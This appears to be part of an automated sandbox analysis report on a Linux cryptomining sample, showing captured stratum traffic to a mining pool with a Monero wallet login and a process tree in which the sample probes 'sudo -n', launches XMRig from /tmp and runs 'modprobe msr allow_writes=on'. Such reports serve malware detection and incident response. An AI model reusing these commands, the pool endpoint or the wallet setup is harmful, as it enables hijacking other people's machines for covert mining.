2024-09-21 19:26:22 UTC	1378	IN	Data Raw: 32 2c 20 36 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 37 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 38 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 39 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 31 5d 0a 20 20 20 20 20 20 20 20 5d 2c 0a 20 20 20 20 20 20 20 20 22 63 6e 2f 75 70 78 32 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 30 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 31 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 32 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 33 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c 20 34 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 32 2c Data Ascii: 2, 6], [2, 7], [2, 8], [2, 9], [2, 10], [2, 11] ], "cn/upx2": [ [2, 0], [2, 1], [2, 2], [2, 3], [2, 4], [2,
2024-09-21 19:26:22 UTC	809	IN	Data Raw: 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 61 62 6c 65 64 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 6e 69 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 2d 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 64 61 65 6d 6f 6e 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 6f 63 6b 73 35 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 2d 73 65 6c 65 63 74 22 3a 20 6e 75 6c 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 Data Ascii: e, "keepalive": true, "enabled": true, "tls": true, "sni": false, "tls-fingerprint": null, "daemon": false, "socks5": null, "self-select": null, "s

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	50070	141.94.96.71	443

Timestamp	Bytes transferred	Direction	Data
2024-09-21 19:26:24 UTC	570	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 41 4a 5a 5a 76 33 72 54 59 7a 4a 58 54 38 68 55 62 62 79 72 7a 64 58 63 54 43 44 74 33 62 57 62 6a 6b 39 73 44 66 59 53 79 6e 6a 4d 34 72 55 59 68 55 75 36 4e 53 32 34 70 73 41 74 7a 6d 42 59 45 67 7a 7a 75 58 71 38 78 46 4b 54 46 43 70 43 31 41 79 4d 64 5a 6b 54 42 78 6d 68 76 6a 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 31 2e 33 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 38 2e 30 20 67 63 63 2f 31 33 2e 32 2e 31 22 2c 22 72 69 67 69 64 22 3a 22 73 65 72 76 65 72 2d 6e 6f 71 79 35 22 2c 22 61 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4AJZZv3rTYzJXT8hUbbyrzdXcTCDt3bWbjk9sDfYSynjM4rUYhUu6NS24psAtzmBYEgzzuXq8xFKTFCpC1AyMdZkTBxmhvj","pass":"x","agent":"XMRig/6.21.3 (Linux x86_64) libuv/1.48.0 gcc/13.2.1","rigid":"server-noqy5","a
2024-09-21 19:26:24 UTC	539	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 65 31 66 38 64 64 33 37 2d 34 37 32 61 2d 34 32 62 37 2d 39 61 32 39 2d 63 64 39 61 66 37 32 33 63 34 61 36 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 64 62 62 62 63 62 37 30 36 64 64 33 31 36 36 34 38 30 35 65 61 66 33 32 36 34 34 65 61 38 63 38 61 31 36 34 37 32 36 62 63 30 32 38 36 33 64 30 32 61 36 66 39 65 39 63 61 31 38 38 38 38 35 64 35 65 34 66 35 33 36 37 65 30 30 30 30 30 30 30 30 66 38 39 34 32 33 32 30 35 62 35 36 35 64 30 64 33 32 34 65 64 66 36 64 66 37 32 63 35 33 61 35 64 35 38 39 30 66 33 38 34 37 64 63 63 36 36 31 30 37 64 37 61 34 37 31 37 30 34 36 39 37 66 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"e1f8dd37-472a-42b7-9a29-cd9af723c4a6","job":{"blob":"1010ddbbbcb706dd31664805eaf32644ea8c8a164726bc02863d02a6f9e9ca188885d5e4f5367e00000000f89423205b565d0d324edf6df72c53a5d5890f3847dcc66107d7a471704697f
2024-09-21 19:26:31 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 62 62 62 63 62 37 30 36 64 64 33 31 36 36 34 38 30 35 65 61 66 33 32 36 34 34 65 61 38 63 38 61 31 36 34 37 32 36 62 63 30 32 38 36 33 64 30 32 61 36 66 39 65 39 63 61 31 38 38 38 38 35 64 35 65 34 66 35 33 36 37 65 30 30 30 30 30 30 30 30 35 63 62 31 34 62 39 62 31 31 39 35 31 38 64 66 32 36 63 61 66 66 61 33 62 32 65 32 66 36 32 37 63 37 61 64 63 37 63 39 62 37 30 31 39 64 62 62 32 39 32 38 64 66 61 63 34 31 31 32 35 65 66 62 30 62 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 56 79 71 39 68 4f 53 70 65 68 63 56 54 53 59 52 4e 48 35 4f 78 4b 55 76 62 4b 61 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7bbbcb706dd31664805eaf32644ea8c8a164726bc02863d02a6f9e9ca188885d5e4f5367e000000005cb14b9b119518df26caffa3b2e2f627c7adc7c9b7019dbb2928dfac41125efb0b","job_id":"5Vyq9hOSpehcVTSYRNH5OxKUvbKa","target":"8
2024-09-21 19:26:44 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 34 62 62 62 63 62 37 30 36 64 64 33 31 36 36 34 38 30 35 65 61 66 33 32 36 34 34 65 61 38 63 38 61 31 36 34 37 32 36 62 63 30 32 38 36 33 64 30 32 61 36 66 39 65 39 63 61 31 38 38 38 38 35 64 35 65 34 66 35 33 36 37 65 30 30 30 30 30 30 30 30 65 65 34 30 39 39 31 36 33 63 39 31 31 61 34 34 30 38 32 30 36 30 38 32 37 64 30 62 65 31 32 62 65 39 34 63 62 62 65 35 37 65 37 31 32 34 30 64 36 65 38 61 61 30 32 30 65 39 33 64 39 37 33 38 30 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 76 55 72 2b 62 79 55 65 4c 67 74 4c 6f 75 6f 4a 4b 44 43 37 76 76 72 30 79 2b 61 66 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f4bbbcb706dd31664805eaf32644ea8c8a164726bc02863d02a6f9e9ca188885d5e4f5367e00000000ee4099163c911a44082060827d0be12be94cbbe57e71240d6e8aa020e93d97380f","job_id":"vUr+byUeLgtLouoJKDC7vvr0y+af","target":"8
2024-09-21 19:26:57 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 31 62 63 62 63 62 37 30 36 64 64 33 31 36 36 34 38 30 35 65 61 66 33 32 36 34 34 65 61 38 63 38 61 31 36 34 37 32 36 62 63 30 32 38 36 33 64 30 32 61 36 66 39 65 39 63 61 31 38 38 38 38 35 64 35 65 34 66 35 33 36 37 65 30 30 30 30 30 30 30 30 37 32 66 30 35 62 65 35 61 62 31 39 38 39 33 31 31 33 37 38 38 30 30 61 34 36 35 64 64 37 38 66 62 32 34 31 35 65 63 34 65 33 63 66 33 31 66 63 38 63 37 65 36 36 64 64 64 30 38 63 38 31 64 66 31 33 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 56 6b 37 79 6b 7a 45 47 47 4d 43 57 2f 69 66 43 4c 46 64 51 4d 74 56 34 38 34 2f 4f 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101081bcbcb706dd31664805eaf32644ea8c8a164726bc02863d02a6f9e9ca188885d5e4f5367e0000000072f05be5ab1989311378800a465dd78fb2415ec4e3cf31fc8c7e66ddd08c81df13","job_id":"Vk7ykzEGGMCW/ifCLFdQMtV484/O","target":"8
2024-09-21 19:27:07 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 62 62 63 62 63 62 37 30 36 64 64 33 31 36 36 34 38 30 35 65 61 66 33 32 36 34 34 65 61 38 63 38 61 31 36 34 37 32 36 62 63 30 32 38 36 33 64 30 32 61 36 66 39 65 39 63 61 31 38 38 38 38 35 64 35 65 34 66 35 33 36 37 65 30 30 30 30 30 30 30 30 30 32 35 38 34 32 39 65 66 65 34 65 65 36 61 32 36 64 32 62 30 34 31 34 35 34 63 62 63 64 34 37 35 32 64 63 62 64 34 38 30 61 65 37 61 32 38 31 39 33 38 32 31 32 39 37 38 39 30 30 33 38 61 35 31 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 72 78 6a 6f 4a 69 48 6b 49 59 53 45 53 33 66 51 75 6b 52 33 6b 51 61 38 54 72 42 61 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108bbcbcb706dd31664805eaf32644ea8c8a164726bc02863d02a6f9e9ca188885d5e4f5367e000000000258429efe4ee6a26d2b041454cbcd4752dcbd480ae7a28193821297890038a517","job_id":"rxjoJiHkIYSES3fQukR3kQa8TrBa","target":"8
2024-09-21 19:27:12 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 66 62 63 62 63 62 37 30 36 64 66 64 62 61 33 36 64 63 62 61 30 39 33 64 35 39 66 38 61 38 31 35 65 30 32 34 63 63 64 64 66 33 65 62 31 63 35 37 61 35 39 35 65 37 32 61 37 65 37 35 62 36 65 65 64 35 37 32 33 66 39 37 33 30 30 30 30 30 30 30 30 32 39 35 65 35 31 65 37 34 63 36 62 62 63 64 39 35 31 65 65 61 61 62 31 32 36 63 64 35 34 34 64 63 38 31 35 30 62 32 66 33 65 65 35 64 38 66 66 39 35 35 36 30 32 63 35 34 39 62 35 34 33 33 63 30 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 61 76 66 52 76 68 45 33 6a 49 34 72 70 6c 2b 31 57 32 4a 71 4b 37 76 4c 78 37 31 71 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10108fbcbcb706dfdba36dcba093d59f8a815e024ccddf3eb1c57a595e72a7e75b6eed5723f97300000000295e51e74c6bbcd951eeaab126cd544dc8150b2f3ee5d8ff955602c549b5433c02","job_id":"avfRvhE3jI4rpl+1W2JqK7vLx71q","target":"8
2024-09-21 19:27:22 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 61 62 63 62 63 62 37 30 36 64 66 64 62 61 33 36 64 63 62 61 30 39 33 64 35 39 66 38 61 38 31 35 65 30 32 34 63 63 64 64 66 33 65 62 31 63 35 37 61 35 39 35 65 37 32 61 37 65 37 35 62 36 65 65 64 35 37 32 33 66 39 37 33 30 30 30 30 30 30 30 30 31 64 30 65 34 34 30 37 32 35 35 32 63 38 35 66 31 33 66 39 30 63 66 62 61 38 34 66 33 38 34 32 39 37 30 63 38 37 39 31 62 35 37 65 34 31 36 34 38 36 33 38 36 62 34 33 61 39 37 34 62 63 34 63 30 33 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4b 47 38 78 4a 75 6a 2f 39 59 33 36 4d 68 47 74 36 78 76 76 69 4a 41 4b 33 42 57 71 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109abcbcb706dfdba36dcba093d59f8a815e024ccddf3eb1c57a595e72a7e75b6eed5723f973000000001d0e44072552c85f13f90cfba84f3842970c8791b57e416486386b43a974bc4c03","job_id":"KG8xJuj/9Y36MhGt6xvviJAK3BWq","target":"8
2024-09-21 19:27:32 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 34 62 63 62 63 62 37 30 36 64 66 64 62 61 33 36 64 63 62 61 30 39 33 64 35 39 66 38 61 38 31 35 65 30 32 34 63 63 64 64 66 33 65 62 31 63 35 37 61 35 39 35 65 37 32 61 37 65 37 35 62 36 65 65 64 35 37 32 33 66 39 37 33 30 30 30 30 30 30 30 30 64 62 63 31 63 66 61 62 62 34 38 30 62 31 64 39 38 64 38 66 35 32 38 35 36 32 65 62 32 33 63 36 62 64 62 36 36 37 32 35 64 61 34 34 62 63 31 38 30 66 63 36 35 38 34 32 31 38 37 62 65 34 36 63 30 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 37 73 76 37 78 54 35 72 55 6b 5a 59 43 69 4f 41 51 55 74 79 4d 57 73 36 64 44 47 5a 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a4bcbcb706dfdba36dcba093d59f8a815e024ccddf3eb1c57a595e72a7e75b6eed5723f97300000000dbc1cfabb480b1d98d8f528562eb23c6bdb66725da44bc180fc65842187be46c06","job_id":"7sv7xT5rUkZYCiOAQUtyMWs6dDGZ","target":"8
2024-09-21 19:27:40 UTC	420	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 63 62 63 62 63 62 37 30 36 35 34 31 39 64 35 39 62 35 37 66 61 61 63 34 32 64 33 31 36 38 31 33 34 38 66 64 30 33 38 64 37 34 64 30 61 31 34 66 39 37 34 61 34 35 62 61 31 66 36 63 30 36 61 30 33 36 39 61 66 39 35 36 32 30 30 30 30 30 30 30 30 64 35 63 39 33 66 66 62 66 38 63 31 61 37 34 30 61 62 63 36 31 33 37 30 38 64 33 61 36 62 62 36 35 63 34 30 38 62 39 38 32 39 37 63 32 37 32 36 32 33 36 30 36 37 35 33 62 34 38 61 65 35 30 31 30 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 64 7a 66 34 62 45 56 74 5a 6b 65 64 6d 38 69 44 48 4f 66 64 4d 74 6e 51 78 33 5a 2f 22 2c 22 74 61 72 67 65 74 22 3a 22 38 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010acbcbcb7065419d59b57faac42d31681348fd038d74d0a14f974a45ba1f6c06a0369af956200000000d5c93ffbf8c1a740abc613708d3a6bb65c408b98297c272623606753b48ae50106","job_id":"dzf4bEVtZkedm8iDHOfdMtnQx3Z/","target":"8

System Behavior

Analysis Process: xmr_linux_amd64 (2).elf PID: 6258, Parent PID: 6182

General

Start time (UTC):	19:26:00
Start date (UTC):	21/09/2024
Path:	/tmp/xmr_linux_amd64 (2).elf
Arguments:	"/tmp/xmr_linux_amd64 (2).elf"
File size:	9076871 bytes
MD5 hash:	2352fd3e33ed079446cad48ee044df18

Chronological Activities

Analysis Process: xmr_linux_amd64 (2).elf PID: 6268, Parent PID: 6258

General

Start time (UTC):	19:26:12
Start date (UTC):	21/09/2024
Path:	/tmp/xmr_linux_amd64 (2).elf
Arguments:	-
File size:	9076871 bytes
MD5 hash:	2352fd3e33ed079446cad48ee044df18

Chronological Activities

Analysis Process: sudo PID: 6268, Parent PID: 6258

General

Start time (UTC):	19:26:12
Start date (UTC):	21/09/2024
Path:	/usr/bin/sudo
Arguments:	sudo -n true
File size:	166056 bytes
MD5 hash:	eb8c10001fe28b9c4c2e42b96347f6db

Chronological Activities

Analysis Process: sudo PID: 6269, Parent PID: 6268

General

Start time (UTC):	19:26:12
Start date (UTC):	21/09/2024
Path:	/usr/bin/sudo
Arguments:	-
File size:	166056 bytes
MD5 hash:	eb8c10001fe28b9c4c2e42b96347f6db

Chronological Activities

Analysis Process: true PID: 6269, Parent PID: 6268

General

Start time (UTC):	19:26:12
Start date (UTC):	21/09/2024
Path:	/usr/bin/true
Arguments:	true
File size:	39256 bytes
MD5 hash:	589a58ff455dbd092cb3ba3dd2c4c63e

Chronological Activities

Analysis Process: xmr_linux_amd64 (2).elf PID: 6294, Parent PID: 6258

General

Start time (UTC):	19:26:22
Start date (UTC):	21/09/2024
Path:	/tmp/xmr_linux_amd64 (2).elf
Arguments:	-
File size:	9076871 bytes
MD5 hash:	2352fd3e33ed079446cad48ee044df18

Chronological Activities

Analysis Process: sudo PID: 6294, Parent PID: 6258

General

Start time (UTC):	19:26:22
Start date (UTC):	21/09/2024
Path:	/usr/bin/sudo
Arguments:	sudo -n /tmp/xmrig/xmrig-6.21.3/xmrig
File size:	166056 bytes
MD5 hash:	eb8c10001fe28b9c4c2e42b96347f6db

Chronological Activities

Analysis Process: sudo PID: 6295, Parent PID: 6294

General

Start time (UTC):	19:26:22
Start date (UTC):	21/09/2024
Path:	/usr/bin/sudo
Arguments:	-
File size:	166056 bytes
MD5 hash:	eb8c10001fe28b9c4c2e42b96347f6db

Chronological Activities

Analysis Process: xmrig PID: 6295, Parent PID: 6294

General

Start time (UTC):	19:26:22
Start date (UTC):	21/09/2024
Path:	/tmp/xmrig/xmrig-6.21.3/xmrig
Arguments:	/tmp/xmrig/xmrig-6.21.3/xmrig
File size:	8285424 bytes
MD5 hash:	7429d24207b100f6c164bf4703b5941e

Chronological Activities

Analysis Process: xmrig PID: 6304, Parent PID: 6295

General

Start time (UTC):	19:26:24
Start date (UTC):	21/09/2024
Path:	/tmp/xmrig/xmrig-6.21.3/xmrig
Arguments:	-
File size:	8285424 bytes
MD5 hash:	7429d24207b100f6c164bf4703b5941e

Chronological Activities

Analysis Process: sh PID: 6304, Parent PID: 6295

General

Start time (UTC):	19:26:24
Start date (UTC):	21/09/2024
Path:	/bin/sh
Arguments:	sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6305, Parent PID: 6304

General

Start time (UTC):	19:26:24
Start date (UTC):	21/09/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: modprobe PID: 6305, Parent PID: 6304

General

Start time (UTC):	19:26:24
Start date (UTC):	21/09/2024
Path:	/sbin/modprobe
Arguments:	/sbin/modprobe msr allow_writes=on
File size:	174424 bytes
MD5 hash:	0b44462b1a40df8039d6d61cfff7ea84

Chronological Activities